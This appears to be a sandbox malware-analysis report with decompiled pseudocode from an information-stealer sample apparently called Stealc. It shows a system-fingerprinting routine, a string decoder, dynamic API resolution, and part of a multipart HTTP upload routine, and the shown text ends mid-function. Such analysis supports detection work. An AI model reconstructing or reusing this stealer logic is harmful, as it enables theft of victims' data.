              0x00179623
              0x0017962b
              0x00179644
              0x0017964c
              0x00179665
              0x0017966d
              0x00179681
              0x00179689
              0x001796a2
              0x001796aa
              0x001796b9
              0x001796c5
              0x001796f0
              0x001796f6
              0x00179708
              0x00179710
              0x00179724
              0x0017972c
              0x00179745
              0x0017974d
              0x00179762
              0x0017976a
              0x00179774
              0x00179776
              0x0017977e
              0x0017977f
              0x00179780
              0x00179789
              0x0017978f
              0x0017978f
              0x001797a1
              0x001797a9
              0x001797bd
              0x001797c5
              0x001797de
              0x001797e6
              0x001797f4
              0x001797fa
              0x001797fc
              0x00179809
              0x0017980f
              0x00179819
              0x001797fe
              0x001797fe
              0x001797fe
              0x0017982e
              0x00179836
              0x0017984a
              0x00179852
              0x0017986b
              0x00179873
              0x0017987c
              0x00179883
              0x00179892
              0x0017989a
              0x001798a2
              0x001798b6
              0x001798be
              0x001798d7
              0x001798df
              0x001798e7
              0x001798f0
              0x001798fd
              0x001798fd
              0x001798f2
              0x001798f2
              0x001798f6
              0x001798fb
              0x00000000
              0x00000000
              0x001798fb
              0x00179911
              0x00179919
              0x0017992d
              0x00179935
              0x0017994e
              0x00179956
              0x00179963
              0x00179977
              0x0017998f
              0x00179995
              0x00179997
              0x001799ab
              0x001799ab
              0x001799b4
              0x001799c9
              0x001799d1
              0x001799e5
              0x001799ed
              0x00179a06
              0x00179a0e
              0x00179a27
              0x00179a2f
              0x00179a43
              0x00179a4b
              0x00179a64
              0x00179a6c
              0x00179a78
              0x00179a90
              0x00179a96
              0x00179aae
              0x00179ab6
              0x00179aca
              0x00179ad2
              0x00179aeb
              0x00179af3
              0x00179b08
              0x00179b0a
              0x00179b0c
              0x00179b0c
              0x00179b16
              0x00179b18
              0x00179b19
              0x00179b1e
              0x00179b25
              0x00179b2f
              0x00179b35
              0x00179b38
              0x00179b4f
              0x00179b51
              0x00179b51
              0x00179b3a
              0x00179b3a
              0x00179b46
              0x00179b4a
              0x00179b4a
              0x00179b5b
              0x00179b73
              0x00179b7b
              0x00179b8f
              0x00179b97
              0x00179baf
              0x00179bb7
              0x00179bc7
              0x00179bd0
              0x00179bd3
              0x00179bde
              0x00179be1
              0x00179bea
              0x00179bee
              0x00179bfd
              0x00179c11
              0x00179c1e
              0x00179c33
              0x00179c3b
              0x00179c43
              0x00179c5a
              0x00179c65
              0x00179c81
              0x00179c8c
              0x00179ca0
              0x00179ca8
              0x00179cc8
              0x00179cd0
              0x00179cdb
              0x00179cf6
              0x00179d01
              0x00179d06
              0x00179d1d
              0x00179d28
              0x00179d44
              0x00179d4f
              0x00179d66
              0x00179d71
              0x00179d8a
              0x00179d92
              0x00179da3
              0x00179dab
              0x00179dba
              0x00179dc2
              0x00179dcd
              0x00179de4
              0x00179def
              0x00179e08
              0x00179e10
              0x00179e21
              0x00179e29
              0x00179e38
              0x00179e40
              0x00179e4b
              0x00179e62
              0x00179e6d
              0x00179e84
              0x00179e8f
              0x00179ea8
              0x00179eb0
              0x00179ecd
              0x00179ed5
              0x00179edd
              0x00179eeb
              0x00179eec
              0x00179efa
              0x00179f07
              0x00179f0f
              0x00179f10
              0x00179f1b
              0x00179f23
              0x00179f33

              APIs
                • Part of subcall function 0017E990: lstrcpy.KERNEL32(00000000,00000000), ref: 0017E9B6
                • Part of subcall function 0017EAAB: lstrlen.KERNEL32(?,?,?,0017D009,00181EC0,00000000,00181EC0,00000000,0017FBD9), ref: 0017EABF
                • Part of subcall function 0017EAAB: lstrcpy.KERNEL32(00000000,?), ref: 0017EAE7
                • Part of subcall function 0017EAAB: lstrcat.KERNEL32(?,00000000), ref: 0017EAF2
                • Part of subcall function 0017EA2F: lstrcpy.KERNEL32(00000000,?), ref: 0017EA5F
                • Part of subcall function 0017D0BE: GetProcessHeap.KERNEL32(00000000,00000104,?,?,0017FBD9), ref: 0017D155
                • Part of subcall function 0017D0BE: RtlAllocateHeap.NTDLL(00000000), ref: 0017D15C
                • Part of subcall function 0017EA69: lstrcpy.KERNEL32(00000000,?), ref: 0017EA97
                • Part of subcall function 0017EA69: lstrcat.KERNEL32(?,00000000), ref: 0017EAA1
              • GetProcessHeap.KERNEL32(00000000,00000104,00181EBC,00181EBC,00181EBC,00181EBC,- Country: ISO?,00181EBC,- IP: IP?,00181EBC,Network Info:,00181EBC,0017FBD9,?,?,?), ref: 001794C8
              • RtlAllocateHeap.NTDLL(00000000), ref: 001794CF
              • GetCurrentProcess.KERNEL32(00000000,00181EBC,00000000,?,?,?), ref: 00179579
              • GetProcessHeap.KERNEL32(00000000,00000104,00181EBC,00000000,00181EBC,00000000,00181EBC,00000000,?,?,?), ref: 001796B2
              • RtlAllocateHeap.NTDLL(00000000), ref: 001796B9
              • GetProcessHeap.KERNEL32(00000000,00000104,00181EBC,00000000), ref: 00179755
              • RtlAllocateHeap.NTDLL(00000000), ref: 0017975C
              • GetProcessHeap.KERNEL32(00000000,00000104,00181EBC,00000000), ref: 0017996A
              • RtlAllocateHeap.NTDLL(00000000), ref: 00179971
              • GetSystemInfo.KERNEL32(?,00181EBC,00000000,00181EBC,00000000), ref: 00179A78
              • GetProcessHeap.KERNEL32(00000000,00000104,00181EBC,?), ref: 00179AFB
              • RtlAllocateHeap.NTDLL(00000000), ref: 00179B02
              • GlobalMemoryStatusEx.KERNEL32(00000000), ref: 00179B2F
              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00179BF6
              • RtlAllocateHeap.NTDLL(00000000), ref: 00179BFD
                • Part of subcall function 0017D460: lstrlen.KERNEL32(?), ref: 0017D565
                • Part of subcall function 0017D661: CloseHandle.KERNEL32(00000000), ref: 0017D6F3
              • lstrlen.KERNEL32(?,00181EBC,00181EBC,00181EBC,00181EBC,00181EBC,User Agents:,00181EBC,00181EBC,00000000), ref: 00179EE5
                • Part of subcall function 00173786: lstrlen.KERNEL32(?), ref: 001737DF
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: Heap$Process$Allocate$lstrcpylstrlen$lstrcat$CloseCurrentGlobalHandleInfoMemoryStatusSystem
              • String ID: - Country: ISO?$- Display Resolution: $- IP: IP?$%d MB$%dx%d$@$Network Info:$User Agents:
              • API String ID: 3168602311-524121769
              • Opcode ID: a6eb721dda6b12c946be4be8f41a740a81d14fc50f1aa4d990b4bdbb90081912
              • Instruction ID: 165d75e2ede0473c969eedd602644d0fa7de504100dbc4a2307fbb38cc7b0f23
              • Opcode Fuzzy Hash: a6eb721dda6b12c946be4be8f41a740a81d14fc50f1aa4d990b4bdbb90081912
              • Instruction Fuzzy Hash: D5728676D0022AABCF01FBA4EC469DDB7F9BF18300F5591A1B519B3161DB306F4A8B91
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • memset.MSVCRT ref: 0017681A
              • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00176835
              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0017683F
              • memcpy.MSVCRT ref: 001768A3
              • lstrcat.KERNEL32(0017FBD9,0017FBD9), ref: 001768C0
              • lstrcat.KERNEL32(0017FBD9,0017FBD9), ref: 001768D4
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
              • String ID:
              • API String ID: 1498829745-0
              • Opcode ID: 37cc39d87081a034e492440430b8eeba321e64ed3c8dfb7f135b1b765269dcdf
              • Instruction ID: b041403b4c50881f82bdcec61949b44775b6c3f8e1d534f23957f0555c1f06b3
              • Opcode Fuzzy Hash: 37cc39d87081a034e492440430b8eeba321e64ed3c8dfb7f135b1b765269dcdf
              • Instruction Fuzzy Hash: 8B21F9B5900219EFDB019FA8DD889EE7BBCFF08785F1440B5F909E2211E7309B559BA1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 37%
              			E00174C21(BYTE** __ebx, void* __ecx, DWORD* __edi, char* _a4) {
              				int _v8;
              				BYTE* _t8;
              				int _t9;
              
              				 *__ebx = 0;
              				_v8 = 0;
              				 *__edi = 0;
              				if(CryptStringToBinaryA(_a4, 0, 1, 0, __edi, 0, 0) != 0) {
              					_t8 =  *0x3836e8(0x40,  *__edi);
              					 *__ebx = _t8;
              					if(_t8 != 0) {
              						_t9 = CryptStringToBinaryA(_a4, 0, 1, _t8, __edi, 0, 0);
              						_v8 = _t9;
              						if(_t9 == 0) {
              							 *__ebx =  *0x3837b4( *__ebx);
              						}
              					}
              				}
              				return _v8;
              			}






              0x00174c32
              0x00174c34
              0x00174c37
              0x00174c41
              0x00174c47
              0x00174c4d
              0x00174c51
              0x00174c5d
              0x00174c63
              0x00174c68
              0x00174c72
              0x00174c72
              0x00174c68
              0x00174c51
              0x00174c79

              APIs
              • CryptStringToBinaryA.CRYPT32(00173628,00000000,00000001,00000000,?,00000000,00000000), ref: 00174C39
              • CryptStringToBinaryA.CRYPT32(00173628,00000000,00000001,00000000,?,00000000,00000000), ref: 00174C5D
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: BinaryCryptString
              • String ID:
              • API String ID: 80407269-0
              • Opcode ID: 520bd598584588ce78eac57bb658fde1f01f3da8c779da54a208047b25d78d8a
              • Instruction ID: ef49b9b8ac1f16ab86f612c05905ed2f02e873dd314e67884a283fa2921b58f0
              • Opcode Fuzzy Hash: 520bd598584588ce78eac57bb658fde1f01f3da8c779da54a208047b25d78d8a
              • Instruction Fuzzy Hash: E9F0E7B0142234BBCB235F66CD4DE8B7FBCEF06BA0F104095F9099A250D3718A40DBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 841 17e08e-17e095 842 17e42e-17e49b LoadLibraryA * 6 841->842 843 17e09b-17e429 GetProcAddress * 40 841->843 844 17e49d-17e506 GetProcAddress * 5 842->844 845 17e50b-17e512 842->845 843->842 844->845 846 17e5cb-17e5d2 845->846 847 17e518-17e5c6 GetProcAddress * 8 845->847 848 17e5d4-17e63d GetProcAddress * 5 846->848 849 17e642-17e649 846->849 847->846 848->849 850 17e6d4-17e6db 849->850 851 17e64f-17e6cf GetProcAddress * 6 849->851 852 17e794-17e79b 850->852 853 17e6e1-17e78f GetProcAddress * 8 850->853 851->850 854 17e79d-17e806 GetProcAddress * 5 852->854 855 17e80b-17e812 852->855 853->852 854->855 856 17e814-17e838 GetProcAddress * 2 855->856 857 17e83d-17e844 855->857 856->857 858 17e846-17e86a GetProcAddress * 2 857->858 859 17e86f-17e876 857->859 858->859 860 17e92f-17e936 859->860 861 17e87c-17e92a GetProcAddress * 8 859->861 862 17e98f 860->862 863 17e938-17e98a GetProcAddress * 4 860->863 861->860 863->862
              C-Code - Quality: 100%
              			E0017E08E() {
              				struct HINSTANCE__* _t1;
              				struct HINSTANCE__* _t8;
              				struct HINSTANCE__* _t9;
              				struct HINSTANCE__* _t10;
              				struct HINSTANCE__* _t11;
              				struct HINSTANCE__* _t12;
              				struct HINSTANCE__* _t13;
              				struct HINSTANCE__* _t14;
              				struct HINSTANCE__* _t15;
              				struct HINSTANCE__* _t16;
              				struct HINSTANCE__* _t17;
              				_Unknown_base(*)()* _t21;
              
              				_t1 =  *0x383768; // 0x76670000
              				if(_t1 != 0) {
              					 *0x383638 = GetProcAddress(_t1,  *0x3834a4);
              					 *0x3836ac = GetProcAddress( *0x383768,  *0x383114);
              					 *0x383614 = GetProcAddress( *0x383768,  *0x3830c8);
              					 *0x3837a0 = GetProcAddress( *0x383768,  *0x3830fc);
              					 *0x383788 = GetProcAddress( *0x383768,  *0x383448);
              					 *0x3835c0 = GetProcAddress( *0x383768,  *0x383128);
              					 *0x383760 = GetProcAddress( *0x383768,  *0x3832c8);
              					 *0x38374c = GetProcAddress( *0x383768,  *0x3830a0);
              					 *0x3836d0 = GetProcAddress( *0x383768,  *0x383118);
              					 *0x3836cc = GetProcAddress( *0x383768,  *0x38315c);
              					 *0x3837c0 = GetProcAddress( *0x383768,  *0x383260);
              					 *0x3837a4 = GetProcAddress( *0x383768,  *0x3834fc);
              					 *0x3835cc = GetProcAddress( *0x383768,  *0x383218);
              					 *0x3835b4 = GetProcAddress( *0x383768,  *0x3832c4);
              					 *0x383648 = GetProcAddress( *0x383768,  *0x38344c);
              					 *0x383620 = GetProcAddress( *0x383768,  *0x3830e4);
              					 *0x383634 = GetProcAddress( *0x383768,  *0x383314);
              					 *0x383654 = GetProcAddress( *0x383768,  *0x383414);
              					 *0x383674 = GetProcAddress( *0x383768,  *0x383410);
              					 *0x383664 = GetProcAddress( *0x383768,  *0x383020);
              					 *0x383678 = GetProcAddress( *0x383768,  *0x3833f4);
              					 *0x3837b4 = GetProcAddress( *0x383768,  *0x383090);
              					 *0x3835f8 = GetProcAddress( *0x383768,  *0x383190);
              					 *0x3835fc = GetProcAddress( *0x383768,  *0x383430);
              					 *0x3836e8 = GetProcAddress( *0x383768,  *0x3830dc);
              					 *0x3835c4 = GetProcAddress( *0x383768,  *0x3833ac);
              					 *0x3836f8 = GetProcAddress( *0x383768,  *0x383518);
              					 *0x383618 = GetProcAddress( *0x383768,  *0x383374);
              					 *0x383660 = GetProcAddress( *0x383768,  *0x3833f8);
              					 *0x383600 = GetProcAddress( *0x383768,  *0x383460);
              					 *0x3837c4 = GetProcAddress( *0x383768,  *0x383390);
              					 *0x383610 = GetProcAddress( *0x383768,  *0x383294);
              					 *0x38361c = GetProcAddress( *0x383768,  *0x3832dc);
              					 *0x3835c8 = GetProcAddress( *0x383768,  *0x383008);
              					 *0x383708 = GetProcAddress( *0x383768,  *0x38334c);
              					 *0x3836c8 = GetProcAddress( *0x383768,  *0x3832a0);
              					 *0x3835ec = GetProcAddress( *0x383768,  *0x383480);
              					 *0x383774 = GetProcAddress( *0x383768,  *0x3831d8);
              					 *0x3836d8 = GetProcAddress( *0x383768,  *0x3832d4);
              					 *0x3836fc = GetProcAddress( *0x383768,  *0x383308);
              				}
              				 *0x383680 = LoadLibraryA( *0x383288);
              				 *0x3836b4 = LoadLibraryA( *0x3834a0);
              				 *0x383740 = LoadLibraryA( *0x383224);
              				 *0x383628 = LoadLibraryA( *0x3831fc);
              				 *0x3836a8 = LoadLibraryA( *0x3833fc);
              				 *0x383790 = LoadLibraryA( *0x383158);
              				_t8 =  *0x3836c0; // 0x76130000
              				if(_t8 != 0) {
              					 *0x383608 = GetProcAddress(_t8,  *0x3831a4);
              					 *0x3835f0 = GetProcAddress( *0x3836c0,  *0x38342c);
              					 *0x3835d8 = GetProcAddress( *0x3836c0,  *0x3831e4);
              					 *0x383744 = GetProcAddress( *0x3836c0,  *0x38340c);
              					 *0x38368c = GetProcAddress( *0x3836c0,  *0x3834f8);
              				}
              				_t9 =  *0x383680; // 0x0
              				if(_t9 != 0) {
              					 *0x38362c = GetProcAddress(_t9,  *0x3832b8);
              					 *0x383670 = GetProcAddress( *0x383680,  *0x3831b8);
              					 *0x383710 = GetProcAddress( *0x383680,  *0x383214);
              					 *0x38373c = GetProcAddress( *0x383680,  *0x3830ec);
              					 *0x383728 = GetProcAddress( *0x383680,  *0x383368);
              					 *0x3836e0 = GetProcAddress( *0x383680,  *0x38351c);
              					 *0x383644 = GetProcAddress( *0x383680,  *0x383280);
              					 *0x383780 = GetProcAddress( *0x383680,  *0x383514);
              				}
              				_t10 =  *0x3836b4; // 0x0
              				if(_t10 != 0) {
              					 *0x3835e0 = GetProcAddress(_t10,  *0x3832c0);
              					 *0x3836c4 = GetProcAddress( *0x3836b4,  *0x383104);
              					 *0x383738 = GetProcAddress( *0x3836b4,  *0x383220);
              					 *0x383750 = GetProcAddress( *0x3836b4,  *0x3834e0);
              					 *0x383624 = GetProcAddress( *0x3836b4,  *0x383358);
              				}
              				_t11 =  *0x383740; // 0x0
              				if(_t11 != 0) {
              					 *0x38360c = GetProcAddress(_t11,  *0x38338c);
              					 *0x38369c = GetProcAddress( *0x383740,  *0x3830b0);
              					 *0x383764 = GetProcAddress( *0x383740,  *0x383068);
              					 *0x383630 = GetProcAddress( *0x383740,  *0x383254);
              					 *0x38372c = GetProcAddress( *0x383740,  *0x3834c4);
              					 *0x383650 = GetProcAddress( *0x383740,  *0x38337c);
              				}
              				_t12 =  *0x38379c; // 0x762b0000
              				if(_t12 != 0) {
              					 *0x3837b0 = GetProcAddress(_t12,  *0x38327c);
              					 *0x3835d4 = GetProcAddress( *0x38379c,  *0x383424);
              					 *0x383798 = GetProcAddress( *0x38379c,  *0x383444);
              					 *0x38378c = GetProcAddress( *0x38379c,  *0x383284);
              					 *0x3835d0 = GetProcAddress( *0x38379c,  *0x38321c);
              					 *0x383718 = GetProcAddress( *0x38379c,  *0x383388);
              					 *0x38370c = GetProcAddress( *0x38379c,  *0x38341c);
              					 *0x3836d4 = GetProcAddress( *0x38379c,  *0x383440);
              				}
              				_t13 =  *0x3835b8; // 0x76170000
              				if(_t13 != 0) {
              					 *0x38366c = GetProcAddress(_t13,  *0x3833a0);
              					 *0x383770 = GetProcAddress( *0x3835b8,  *0x383164);
              					 *0x383684 = GetProcAddress( *0x3835b8,  *0x383494);
              					 *0x3836f0 = GetProcAddress( *0x3835b8,  *0x383110);
              					 *0x3837ac = GetProcAddress( *0x3835b8,  *0x383530);
              				}
              				_t14 =  *0x38367c; // 0x76b00000
              				if(_t14 != 0) {
              					 *0x3835bc = GetProcAddress(_t14,  *0x3830d8);
              					 *0x383668 = GetProcAddress( *0x38367c,  *0x383244);
              				}
              				_t15 =  *0x383790; // 0x0
              				if(_t15 != 0) {
              					 *0x38371c = GetProcAddress(_t15,  *0x3831a0);
              					 *0x383784 = GetProcAddress( *0x383790,  *0x383274);
              				}
              				_t16 =  *0x383628; // 0x0
              				if(_t16 != 0) {
              					 *0x383698 = GetProcAddress(_t16,  *0x38319c);
              					 *0x383778 = GetProcAddress( *0x383628,  *0x383188);
              					 *0x383690 = GetProcAddress( *0x383628,  *0x383180);
              					 *0x383694 = GetProcAddress( *0x383628,  *0x38333c);
              					 *0x383748 = GetProcAddress( *0x383628,  *0x3833b0);
              					 *0x3837a8 = GetProcAddress( *0x383628,  *0x383394);
              					 *0x3836b8 = GetProcAddress( *0x383628,  *0x3833b4);
              					 *0x383640 = GetProcAddress( *0x383628,  *0x3834bc);
              				}
              				_t17 =  *0x3836a8; // 0x0
              				if(_t17 != 0) {
              					 *0x383754 = GetProcAddress(_t17,  *0x38310c);
              					 *0x3835f4 = GetProcAddress( *0x3836a8,  *0x383474);
              					 *0x383704 = GetProcAddress( *0x3836a8,  *0x383184);
              					_t21 = GetProcAddress( *0x3836a8,  *0x383098);
              					 *0x38365c = _t21;
              					return _t21;
              				}
              				return _t17;
              			}















              0x0017e08e
              0x0017e095
              0x0017e0ae
              0x0017e0c5
              0x0017e0dc
              0x0017e0f3
              0x0017e10a
              0x0017e121
              0x0017e138
              0x0017e14f
              0x0017e166
              0x0017e17d
              0x0017e194
              0x0017e1ab
              0x0017e1c2
              0x0017e1d9
              0x0017e1f0
              0x0017e207
              0x0017e21e
              0x0017e235
              0x0017e24c
              0x0017e263
              0x0017e27a
              0x0017e291
              0x0017e2a8
              0x0017e2bf
              0x0017e2d6
              0x0017e2ed
              0x0017e304
              0x0017e31b
              0x0017e332
              0x0017e349
              0x0017e360
              0x0017e377
              0x0017e38e
              0x0017e3a5
              0x0017e3bc
              0x0017e3d3
              0x0017e3ea
              0x0017e401
              0x0017e418
              0x0017e429
              0x0017e429
              0x0017e440
              0x0017e451
              0x0017e462
              0x0017e473
              0x0017e484
              0x0017e48f
              0x0017e494
              0x0017e49b
              0x0017e4b0
              0x0017e4c7
              0x0017e4de
              0x0017e4f5
              0x0017e506
              0x0017e506
              0x0017e50b
              0x0017e512
              0x0017e52b
              0x0017e542
              0x0017e559
              0x0017e570
              0x0017e587
              0x0017e59e
              0x0017e5b5
              0x0017e5c6
              0x0017e5c6
              0x0017e5cb
              0x0017e5d2
              0x0017e5e7
              0x0017e5fe
              0x0017e615
              0x0017e62c
              0x0017e63d
              0x0017e63d
              0x0017e642
              0x0017e649
              0x0017e662
              0x0017e679
              0x0017e690
              0x0017e6a7
              0x0017e6be
              0x0017e6cf
              0x0017e6cf
              0x0017e6d4
              0x0017e6db
              0x0017e6f4
              0x0017e70b
              0x0017e722
              0x0017e739
              0x0017e750
              0x0017e767
              0x0017e77e
              0x0017e78f
              0x0017e78f
              0x0017e794
              0x0017e79b
              0x0017e7b0
              0x0017e7c7
              0x0017e7de
              0x0017e7f5
              0x0017e806
              0x0017e806
              0x0017e80b
              0x0017e812
              0x0017e827
              0x0017e838
              0x0017e838
              0x0017e83d
              0x0017e844
              0x0017e859
              0x0017e86a
              0x0017e86a
              0x0017e86f
              0x0017e876
              0x0017e88f
              0x0017e8a6
              0x0017e8bd
              0x0017e8d4
              0x0017e8eb
              0x0017e902
              0x0017e919
              0x0017e92a
              0x0017e92a
              0x0017e92f
              0x0017e936
              0x0017e94b
              0x0017e962
              0x0017e979
              0x0017e984
              0x0017e98a
              0x00000000
              0x0017e98a
              0x0017e98f

              APIs
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc$LibraryLoad
              • String ID:
              • API String ID: 2238633743-0
              • Opcode ID: 90c98587883c6742c9eb3d3a740a0c8cde9eccaf33adaa258b81b19d3519850c
              • Instruction ID: 194eac079cb6c7af4f333a909e06d872a3f10a1197c20115ebda12f0498497a9
              • Opcode Fuzzy Hash: 90c98587883c6742c9eb3d3a740a0c8cde9eccaf33adaa258b81b19d3519850c
              • Instruction Fuzzy Hash: 0332C1B5541341BFEB039F69ED989247FAEFB08F01B1455A9E90592330EB368B65EF00
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 75%
              			E00173786(void* __ecx, void* __eflags, intOrPtr _a4, char _a8, char _a20, intOrPtr _a88, intOrPtr _a100, intOrPtr _a104) {
              				void* _v16;
              				char _v28;
              				char _v32;
              				char _v36;
              				int _v40;
              				char _v44;
              				void* _v48;
              				void* _v52;
              				void* _v56;
              				intOrPtr _v60;
              				char _v72;
              				char _v84;
              				int _v96;
              				char _v108;
              				char _v120;
              				char _v132;
              				char _v144;
              				intOrPtr _v160;
              				intOrPtr _v180;
              				intOrPtr _v188;
              				intOrPtr _v200;
              				void _v204;
              				char _v264;
              				char _v2264;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* _t192;
              				intOrPtr _t204;
              				void* _t233;
              				void* _t260;
              				void* _t261;
              				void* _t373;
              				void* _t376;
              				void* _t387;
              				void* _t395;
              				signed int _t403;
              				void* _t408;
              				void* _t409;
              				signed int _t411;
              				void* _t417;
              				long _t435;
              				void* _t507;
              				void* _t508;
              				void* _t509;
              				void* _t512;
              
              				_t518 = __eflags;
              				_t509 = _t508 - 0xc;
              				E0017E9C2( &_a8, __ecx, _t509, __eflags);
              				_t192 = E001730F8();
              				_t411 = 0xf;
              				_t403 = 0;
              				memcpy( &_v204, _t192, _t411 << 2);
              				_v32 = 0;
              				_v40 = 0;
              				_v44 = 0;
              				_v36 = 0;
              				E0017D912(0,  &_v32,  &_v40, _a100, _a104);
              				E0017D912(0,  &_v44,  &_v36, _a88,  *0x383658(_a88,  &_v264));
              				_t512 = _t509 + 0x34;
              				E0017E990(_a4, _t518, 0x17fbd9);
              				E0017E990( &_v72, _t518, 0x17fbd9);
              				E0017E990( &_v16, _t518, 0x17fbd9);
              				E0017E990( &_v96, _t518, 0x17fbd9);
              				E0017E990( &_v108, _t518, 0x17fbd9);
              				_t204 =  *0x383694(0, 1, 0, 0, 0);
              				_push( *0x3833a4);
              				_v60 = _t204;
              				_push(_v200);
              				if( *0x383754() == 0) {
              					_t403 = 1;
              				}
              				_t521 = _v60;
              				if(_v60 != 0) {
              					_t233 = E0017D78F(_t403,  &_v120, _t521, 0x14);
              					_pop(_t417);
              					E0017EA2F(E0017EA69( &_v72, _t417, _t233,  &_v132, _t521), _t417,  &_v72);
              					E00171839(_v132);
              					E00171839(_v120);
              					E0017EA2F(E0017EAAB(E0017EA69(E0017EAAB( &_v96, _t417,  &_v144, _t521, "\r\n------"), _t417,  &_v72,  &_v132, _t521), _t417,  &_v120, _t521, "--\r\n"), _t417,  &_v96);
              					E00171839(_v120);
              					E00171839(_v132);
              					E00171839(_v144);
              					E0017EA2F(E0017EA69(E0017EAAB( &_v108, _t417,  &_v28, _t521,  *0x38306c), _t417,  &_v72,  &_v84, _t521), _t417,  &_v108);
              					E00171839(_v84);
              					E00171839(_v28);
              					_t260 =  *0x383778(_v60, _v188, _v180, 0, 0, 3, 0, 0);
              					_v56 = _t260;
              					if(_t260 != 0) {
              						asm("sbb ebx, ebx");
              						_t261 =  *0x3837a8(_t260,  *0x3833c0, _v160,  *0x3831f8, 0, 0, ( ~_t403 & 0x00800000) + 0x400100, 0);
              						_v52 = _t261;
              						_t523 = _t261;
              						if(_t261 != 0) {
              							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, "------"), _t417,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EA69( &_v16, _t417,  &_v72,  &_v28, _t523), _t417,  &_v16);
              							E00171839(_v28);
              							_t407 = "\r\n";
              							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, "\r\n"), _t417,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v84, _t523,  *0x38322c), _t417,  &_v16);
              							E00171839(_v84);
              							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523,  *0x383398), _t417,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, "\"\r\n\r\n"), _t417,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EA69( &_v16, _t417,  &_a20,  &_v28, _t523), _t417,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, "\r\n"), _t417,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, "------"), _t417,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EA69( &_v16, _t417,  &_v72,  &_v28, _t523), _t417,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, "\r\n"), _t417,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v84, _t523,  *0x38322c), _t417,  &_v16);
              							E00171839(_v84);
              							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523,  *0x383324), _t417,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, "\"\r\n\r\n"), _t417,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, _v36), _t417,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, _t407), _t417,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, _t417,  &_v28, _t523, "------"), _t417,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EA69( &_v16, _t417,  &_v72,  &_v28, _t523), _t417,  &_v16);
              							E00171839(_v28);
